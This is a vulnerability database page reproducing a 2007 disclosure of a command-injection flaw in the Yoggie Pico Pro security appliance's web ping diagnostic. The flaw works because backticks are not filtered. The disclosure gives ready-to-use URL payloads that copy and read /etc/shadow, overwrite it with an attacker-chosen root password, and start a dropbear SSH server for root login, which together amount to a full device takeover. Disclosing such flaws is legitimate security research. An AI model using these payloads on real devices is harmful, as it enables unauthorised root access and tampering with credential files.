Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

yoggie-exec.txt

🗓️ 03 Jul 2007 00:00:00Reported by Cody BrociousType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

Yoggie Pico Pro vulnerability in web interface

Code
`This vulnerability affects the Yoggie Pico Pro (and most certainly the  
Yoggie Pico, due to them being effectively identical) security  
appliance. They expose a 'ping' function in their web interface for  
diagnostic purposes, which passes the IP/hostname given directly to  
ping in the form of 'ping -c 10 <given ip>'. They do basic checking  
for ampersands, semicolons, and pipes, but do not check for backticks,  
which allows you to execute commands as root on the device.  
  
Proof of concept:  
When run from a machine with a Yoggie Pico Pro connected,  
yoggie.yoggie.com resolves to the IP of the device, so these links  
will of course not work unless you have a device connected. I didn't  
brute-force the root password, so I explain how you can replace their  
/etc/shadow to set the password to whatever you choose.  
  
To access the original /etc/shadow:  
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60cp%20/etc/shadow%20shadow.txt%60  
https://yoggie.yoggie.com:8443/cgi-bin/shadow.txt  
Replace the root password with the password of your choosing, then  
wrap the file in single quotes and urlencode the entire string.  
  
To replace the original /etc/shadow with your own:  
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60echo%20<urlencoded  
shadow file>%20%3E%20/etc/shadow%60  
  
Finally, running dropbear sshd on port 7290 (random choice -- not  
blocked by their firewall rules)  
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping&param=%60/usr/sbin/dropbear%20-p%207290%60  
  
Log in as root with the password chosen, and you now have complete  
control over the device. It's quite powerful little computer, and a  
whole hell of a lot of fun to play around with. A word of advice,  
though -- don't touch libc in any way, shape, or form, as there's no  
reflash mechanism I've found on the device, which is why I now have a  
bricked pico pro sitting on my desk ;)  
  
- Cody Brocious  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
yoggie pico prosecurity appliancecommand executionroot accessdropbear ssh
17